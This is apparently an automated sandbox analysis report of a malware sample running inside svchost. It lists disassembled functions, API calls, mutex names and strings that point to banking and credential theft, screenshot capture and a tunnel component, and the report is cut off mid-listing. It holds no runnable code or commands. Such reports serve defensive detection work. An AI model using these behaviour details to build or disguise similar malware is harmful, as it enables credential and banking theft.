ReleaseMutex.KERNEL32(00000000), ref: 02D41C8F
GetHandleInformation.KERNEL32(00000000,?), ref: 02D41CA1
CloseHandle.KERNEL32(00000000), ref: 02D41CB2

Strings

5e8dc4c1, xrefs: 02D41BA2, 02D41BAD
pass.log, xrefs: 02D41C28
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D41C6E

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CreateErrorFileHandleLastMutexPath$AdminAttributesBackslashCloseDeleteDirectoryFolderInformationMakeReleaseSleepSystemUser
String ID: 5e8dc4c1$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$pass.log
API String ID: 1707266166-187836521
Opcode ID: 0f28e8da7810b4153b43712a474b6307eaecd1b50cbc811ae63349a4880c3e90
Instruction ID: 2b48da0b11a96a483c298c11b6c88e0f1a20d8009c34cb449551c707a176d48b
Opcode Fuzzy Hash: 0f28e8da7810b4153b43712a474b6307eaecd1b50cbc811ae63349a4880c3e90
Instruction Fuzzy Hash: 9431D230944219AFDB218B24E81CBEABBA8EF45301F548595E88AD7340EF70DED4CB60

Function 02D3B240 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc0d9), ref: 02D3B26A
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3B2AC
GetLastError.KERNEL32 ref: 02D3B2B8
IsUserAnAdmin.SHELL32 ref: 02D3B2BC
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3B2CD
SetLastError.KERNEL32(00000000), ref: 02D3B2D4
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3B303
GetLastError.KERNEL32 ref: 02D3B309
IsUserAnAdmin.SHELL32 ref: 02D3B30D
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3B31E
SetLastError.KERNEL32(00000000), ref: 02D3B325
_snprintf.MSVCRT ref: 02D3B35A
Sleep.KERNEL32(00000FA0,?), ref: 02D3B370

Strings

5e8dc0d9, xrefs: 02D3B265, 02D3B270
%s\%02d.bmp, xrefs: 02D3B349
scrs, xrefs: 02D3B2E9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$5e8dc0d9$scrs
API String ID: 224938940-3741360634
Opcode ID: f0c0f7049bd63a6379f5acb0393cd89bd7df6f2043fbc859c5b9f16a4862fb6a
Instruction ID: 8e7099587be5c82ae480f935f10b13b89414d722e773ebd2d5b6aebb9a6f7b5d
Opcode Fuzzy Hash: f0c0f7049bd63a6379f5acb0393cd89bd7df6f2043fbc859c5b9f16a4862fb6a
Instruction Fuzzy Hash: C0312475A002185BCB219B74EC9CBEA77A8AB49704F844595E989C7300EB70DD84CBB0

Function 02D3E8D0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc1e5), ref: 02D3E8FA
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E93C
GetLastError.KERNEL32 ref: 02D3E948
IsUserAnAdmin.SHELL32 ref: 02D3E94C
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E95D
SetLastError.KERNEL32(00000000), ref: 02D3E964
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E993
GetLastError.KERNEL32 ref: 02D3E999
IsUserAnAdmin.SHELL32 ref: 02D3E99D
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E9AE
SetLastError.KERNEL32(00000000), ref: 02D3E9B5
_snprintf.MSVCRT ref: 02D3E9EA
Sleep.KERNEL32(00000FA0,?), ref: 02D3EA00

Strings

%s\%02d.bmp, xrefs: 02D3E9D9
scrs, xrefs: 02D3E979
5e8dc1e5, xrefs: 02D3E8F5, 02D3E900

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$5e8dc1e5$scrs
API String ID: 224938940-3256838827
Opcode ID: 76f461ff98d9658beb7749bbf2909bcc3c5777cf85c9fba6ce9a8e19640802f2
Instruction ID: 009f07fac3b9633d8d5029cf3cdbd1b806e0d5d1450ad4e70401525b0b0598c1
Opcode Fuzzy Hash: 76f461ff98d9658beb7749bbf2909bcc3c5777cf85c9fba6ce9a8e19640802f2
Instruction Fuzzy Hash: CA310571D002195BCB21DB74EC9CBEA77A8AF49700F944890E985D7380EBB0DD94CBB0

Function 02D41990 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5E8DC3D7), ref: 02D419BA
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D419FC
GetLastError.KERNEL32 ref: 02D41A08
IsUserAnAdmin.SHELL32 ref: 02D41A0C
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41A1D
SetLastError.KERNEL32(00000000), ref: 02D41A24
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D41A53
GetLastError.KERNEL32 ref: 02D41A59
IsUserAnAdmin.SHELL32 ref: 02D41A5D
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41A6E
SetLastError.KERNEL32(00000000), ref: 02D41A75
_snprintf.MSVCRT ref: 02D41AAA
Sleep.KERNEL32(00000FA0,?), ref: 02D41AC0

Strings

5E8DC3D7, xrefs: 02D419B5, 02D419C0
%s\%02d.bmp, xrefs: 02D41A99
scrs, xrefs: 02D41A39

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$5E8DC3D7$scrs
API String ID: 224938940-1906680958
Opcode ID: e3464785cc23c8cadc3a90933ba19a334b4d74a21ed5935f1286db67ad9729e0
Instruction ID: a53485c2504c039317817a1e5d903033a74f4b9f4658e57d198c592878308209
Opcode Fuzzy Hash: e3464785cc23c8cadc3a90933ba19a334b4d74a21ed5935f1286db67ad9729e0
Instruction Fuzzy Hash: 0431F0719402195BCB209B74A89CBEA7BE8AB49740F984591E9C9C7300EB70DDD9CBB0

Function 02D3F7E0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc163), ref: 02D3F80A
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3F84C
GetLastError.KERNEL32 ref: 02D3F858
IsUserAnAdmin.SHELL32 ref: 02D3F85C
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3F86D
SetLastError.KERNEL32(00000000), ref: 02D3F874
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3F8A3
GetLastError.KERNEL32 ref: 02D3F8A9
IsUserAnAdmin.SHELL32 ref: 02D3F8AD
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3F8BE
SetLastError.KERNEL32(00000000), ref: 02D3F8C5
_snprintf.MSVCRT ref: 02D3F8FA
Sleep.KERNEL32(00000FA0,?), ref: 02D3F910

Strings

%s\%02d.bmp, xrefs: 02D3F8E9
5e8dc163, xrefs: 02D3F805, 02D3F810
scrs, xrefs: 02D3F889

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$5e8dc163$scrs
API String ID: 224938940-108755612
Opcode ID: 8f5dcdae41a1e116c608601697e5d921b835a2ac5f4fb2eb49e44c07638db956
Instruction ID: 960f005a74d05cee423aa0ec54a55868b3354c91dfceef523acf01f5e5387ed8
Opcode Fuzzy Hash: 8f5dcdae41a1e116c608601697e5d921b835a2ac5f4fb2eb49e44c07638db956
Instruction Fuzzy Hash: 333112B1E402195FCB219B74AC9CBEA77A8AB45700FA44590E985C3300EBB0DD84CBA0

Function 02D33140 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 97stringthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D33160
GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D331A8
SetErrorMode.KERNEL32(00000001), ref: 02D331BE
GetCurrentThread.KERNEL32 ref: 02D331C6
SetThreadPriority.KERNEL32(00000000), ref: 02D331CD
lstrcpynA.KERNEL32(02D7DFC4,?,00000005), ref: 02D331EF
GetDriveTypeA.KERNEL32(02D7DFC4), ref: 02D331F6

Part of subcall function 02D33000: memset.MSVCRT ref: 02D33021
Part of subcall function 02D33000: GetDriveTypeA.KERNEL32(02D7DFC4,?,?,?), ref: 02D33038
Part of subcall function 02D33000: SetCurrentDirectoryA.KERNEL32(02D7DFC4,?,?,?), ref: 02D33048
Part of subcall function 02D33000: _snprintf.MSVCRT ref: 02D33075
Part of subcall function 02D33000: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02D33097
Part of subcall function 02D33000: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,74DE9300), ref: 02D330C1
Part of subcall function 02D33000: LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D330D0
Part of subcall function 02D33000: WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02D330E9
Part of subcall function 02D33000: UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D330FA
Part of subcall function 02D33000: GetHandleInformation.KERNEL32(00000000,?), ref: 02D33117
Part of subcall function 02D33000: CloseHandle.KERNEL32(00000000), ref: 02D33128

lstrcpynA.KERNEL32(02D7DFC4,?,00000005), ref: 02D3323F
GetDriveTypeA.KERNEL32(02D7DFC4), ref: 02D33246

Strings

Environment, xrefs: 02D33189
Identities, xrefs: 02D33190
AppEvents, xrefs: 02D33174, 02D33294, 02D332A0
Software, xrefs: 02D33197
Control Panel, xrefs: 02D33182
System, xrefs: 02D3319E
Console, xrefs: 02D3317B

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$Drive$Type$CurrentHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLockLogicalModePointerPriorityStringsUnlockWrite_snprintf
String ID: AppEvents$Console$Control Panel$Environment$Identities$Software$System
API String ID: 1338089429-328203234
Opcode ID: 0d3ad3faa24e02c245e4be0f8cf9994a75da1c28697c863ff3332fa22498c104
Instruction ID: 52caa5a7b775611c76599cf43cd620ddb2e286bf012c5923ba5ff08c99e0e0c1
Opcode Fuzzy Hash: 0d3ad3faa24e02c245e4be0f8cf9994a75da1c28697c863ff3332fa22498c104
Instruction Fuzzy Hash: B731BDB5D402949BDB11EF90EA1C7AEBB66FF00704F904989E90996380D7745E54CFE1

Function 02D408E0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 83sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D408FC
Sleep.KERNEL32(00000064), ref: 02D40912
OpenMutexA.KERNEL32(00100000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D40920
ReleaseMutex.KERNEL32(00000000), ref: 02D40929
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D40947
CloseHandle.KERNEL32(00000000), ref: 02D40955
CreateThread.KERNEL32(00000000,00000000,02D40790,00000000,00000000,00000000), ref: 02D4096A
Sleep.KERNEL32(00009C40), ref: 02D4097B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D40980
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D40994
CloseHandle.KERNEL32(00000000), ref: 02D409A2
PathAddBackslashA.SHLWAPI(5e8dc15b), ref: 02D409AD
Sleep.KERNEL32(00009C40,5e8dc15b,INIST), ref: 02D409C7

Strings

INIST, xrefs: 02D409B3
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02D408F0, 02D40914
5e8dc15b, xrefs: 02D409A8, 02D409B8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
String ID: 5e8dc15b$INIST$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
API String ID: 2736094147-3345590504
Opcode ID: 253eb6d23db45943a1c6765bb4af0dbb4bc90b583561ff6780eefc56cb95fe7f
Instruction ID: f164390c7ca615906129c99d48331edce952ba497747a183845b3a5232a77116
Opcode Fuzzy Hash: 253eb6d23db45943a1c6765bb4af0dbb4bc90b583561ff6780eefc56cb95fe7f
Instruction Fuzzy Hash: C921D332A853156BF2219761AC0AF1A73989F44B66F584604FF45A63C0DFB49D048AB6

Function 02D40070 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 83sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D4008C
Sleep.KERNEL32(00000064), ref: 02D400A2
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D400B0
ReleaseMutex.KERNEL32(00000000), ref: 02D400B9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D400D7
CloseHandle.KERNEL32(00000000), ref: 02D400E5
CreateThread.KERNEL32(00000000,00000000,02D3FF20,00000000,00000000,00000000), ref: 02D400FA
Sleep.KERNEL32(00009C40), ref: 02D4010B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D40110
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D40124
CloseHandle.KERNEL32(00000000), ref: 02D40132
PathAddBackslashA.SHLWAPI(5E8DC123), ref: 02D4013D
Sleep.KERNEL32(00009C40,5E8DC123,IBANK), ref: 02D40157

Strings

5E8DC123, xrefs: 02D40138, 02D40148
IBANK, xrefs: 02D40143
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}, xrefs: 02D40080, 02D400A4

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
String ID: 5E8DC123$IBANK$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
API String ID: 2736094147-2581443150
Opcode ID: 4a5178bee18f3a78cdc70b8a634a0de907996e13ecd3c07deb3c383bece1118c
Instruction ID: 275d43ca49e4c21c9002621ec1a0f63c452be3d9934188749a3677b7f240cd0b
Opcode Fuzzy Hash: 4a5178bee18f3a78cdc70b8a634a0de907996e13ecd3c07deb3c383bece1118c
Instruction Fuzzy Hash: EB21D332A857142BF22167A0AC0EF1E73989F45BA5F244604FE45A63C0DFB4AC048AB6

Function 02D41060 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 83sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D4107C
Sleep.KERNEL32(00000064), ref: 02D41092
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D410A0
ReleaseMutex.KERNEL32(00000000), ref: 02D410A9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D410C7
CloseHandle.KERNEL32(00000000), ref: 02D410D5
CreateThread.KERNEL32(00000000,00000000,02D40DE0,00000000,00000000,00000000), ref: 02D410EA
Sleep.KERNEL32(00009C40), ref: 02D410FB
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D41100
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D41114
CloseHandle.KERNEL32(00000000), ref: 02D41122
PathAddBackslashA.SHLWAPI(5E8DC3C1), ref: 02D4112D
Sleep.KERNEL32(00009C40,5E8DC3C1,INTER), ref: 02D41147

Strings

INTER, xrefs: 02D41133
5E8DC3C1, xrefs: 02D41128, 02D41138
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}, xrefs: 02D41070, 02D41094

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
String ID: 5E8DC3C1$INTER$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
API String ID: 2736094147-304506436
Opcode ID: 4fc6b9f11d771c346bf426eaf6fddfc4bbc6eeef39ffcacea27d0ef19ae6b483
Instruction ID: c6c24db540f5e8b4c7598d9902a9dd3369cc9df1e5e2507fb334c360ced3d75a
Opcode Fuzzy Hash: 4fc6b9f11d771c346bf426eaf6fddfc4bbc6eeef39ffcacea27d0ef19ae6b483
Instruction Fuzzy Hash: F321F831AC47552BF32197A0AC0EF1A73D49F05B55F244604FA49763C0DFB4EC4586B9

Function 02D3F1B0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 83sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D3F1CC
Sleep.KERNEL32(00000064), ref: 02D3F1E2
OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D3F1F0
ReleaseMutex.KERNEL32(00000000), ref: 02D3F1F9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D3F217
CloseHandle.KERNEL32(00000000), ref: 02D3F225
CreateThread.KERNEL32(00000000,00000000,02D3EDD0,00000000,00000000,00000000), ref: 02D3F23A
Sleep.KERNEL32(00009C40), ref: 02D3F24B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D3F250
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D3F264
CloseHandle.KERNEL32(00000000), ref: 02D3F272
PathAddBackslashA.SHLWAPI(5E8DC1A1), ref: 02D3F27D
Sleep.KERNEL32(00009C40,5E8DC1A1,FAKTURA), ref: 02D3F297

Strings

FAKTURA, xrefs: 02D3F283
5E8DC1A1, xrefs: 02D3F278, 02D3F288
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02D3F1C0, 02D3F1E4

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
String ID: 5E8DC1A1$FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
API String ID: 2736094147-1599947135
Opcode ID: 65be2c10bebdb56d5aac3df591abd7fca99bc3fb1c5d4b15b97f4dc587a51096
Instruction ID: 9d77740c95d9d14b46e79dc3a447381725150d716e56f8bfc7a0c69d01c370ed
Opcode Fuzzy Hash: 65be2c10bebdb56d5aac3df591abd7fca99bc3fb1c5d4b15b97f4dc587a51096
Instruction Fuzzy Hash: 3921C136EC53197EE212A760EC0AF6A7384AF44B65F548604FE85A63C0DBB49C048AB5

Function 02D23AE0 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 268threadCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D7D3A4,?), ref: 02D23BFD
PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23C33
PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23C67
PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23CE7

Part of subcall function 02D450A0: VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D450C8

GetCurrentThreadId.KERNEL32 ref: 02D23D45
PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23D77
GetCurrentProcessId.KERNEL32(00000000,00000040,?,00000000,00000000), ref: 02D23DF8
GetCurrentProcess.KERNEL32(00000000), ref: 02D23DFF
MiniDumpWriteDump.DBGHELP(00000000), ref: 02D23E06
PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23E1A

Strings

minidump.bin, xrefs: 02D23DB8
scr.bmp, xrefs: 02D23D28
sysinfo.log, xrefs: 02D23CA8
DEBUG, xrefs: 02D23E1C
csm, xrefs: 02D23B05

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: BackslashPath$Current$DumpProcess$MiniQueryThreadVirtualWrite
String ID: DEBUG$csm$minidump.bin$scr.bmp$sysinfo.log
API String ID: 2628503961-3850779975
Opcode ID: 49ee37bebe9fc5517db672e53066bea948ecfe4d6c49d1decba6db7e72d91524
Instruction ID: 41722c44ef34d86033a9186603a7e9da229e27b51478d6ca31a79a784cb077c6
Opcode Fuzzy Hash: 49ee37bebe9fc5517db672e53066bea948ecfe4d6c49d1decba6db7e72d91524
Instruction Fuzzy Hash: A99138306046698FDB29DF38A4A87EAB7E2EF55308F5481D5E889D7300DB359D8DCB90

Function 02D3C978 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C997
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C9D1
GetLastError.KERNEL32 ref: 02D3C9DB
IsUserAnAdmin.SHELL32 ref: 02D3C9E3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C9F4
SetLastError.KERNEL32(00000000), ref: 02D3C9FB
GetFileAttributesA.KERNEL32(?), ref: 02D3CA31
SetCurrentDirectoryA.KERNEL32(?), ref: 02D3CA70
PathAddBackslashA.SHLWAPI(5E8DC08D,?,?), ref: 02D3CAB7

Strings

path_ctunnel.txt, xrefs: 02D3CAF8
5E8DC08D, xrefs: 02D3C992, 02D3C999, 02D3CAB2, 02D3CAB9
ctunnel.zip, xrefs: 02D3CA10
\, xrefs: 02D3CA4F

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
String ID: 5E8DC08D$\$ctunnel.zip$path_ctunnel.txt
API String ID: 2545201083-1071034778
Opcode ID: a19d3ead2bc50d098c8d5b8a7905e24aeab55f058f208bda95b323896c2e634a
Instruction ID: 8d36831a7f264bbfa422269380ba1f2b20d3be7cbbbb3219b5b2c6aa11b44652
Opcode Fuzzy Hash: a19d3ead2bc50d098c8d5b8a7905e24aeab55f058f208bda95b323896c2e634a
Instruction Fuzzy Hash: B351F7319182598FCB16CB28E86CBE67BE5EF49300F1485D5D4CAE7301EB719D88CB60

Function 02D280A0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 156synchronizationmemorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02D280BC
GetThreadDesktop.USER32(00000000,?,?,02D27F92,00000000,00000000), ref: 02D280C3
SetThreadDesktop.USER32(00000000,?,?,02D27F92,00000000,00000000), ref: 02D280CF

Part of subcall function 02D2D850: GetTickCount.KERNEL32 ref: 02D2D858
Part of subcall function 02D2D850: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D869
Part of subcall function 02D2D850: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02D6F5A0), ref: 02D2D893
Part of subcall function 02D2D850: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D8AC
Part of subcall function 02D2D850: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02D6F54C), ref: 02D2D8D9
Part of subcall function 02D2D850: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D8EC
Part of subcall function 02D2D850: CreateMutexA.KERNEL32(00000000,00000000,02D6F670,?,?,02D27F92,00000000,00000000), ref: 02D2D90A
Part of subcall function 02D2D850: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D91B
Part of subcall function 02D2D850: CreateMutexA.KERNEL32(00000000,00000000,02D6F630,?,?,02D27F92,00000000,00000000), ref: 02D2D92F
Part of subcall function 02D2D850: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D948
Part of subcall function 02D2D850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D95B
Part of subcall function 02D2D850: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D96E

Part of subcall function 02D2D9A0: memset.MSVCRT ref: 02D2D9B9
Part of subcall function 02D2D9A0: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02D2D9D2

Part of subcall function 02D49AA0: malloc.MSVCRT ref: 02D49AB2

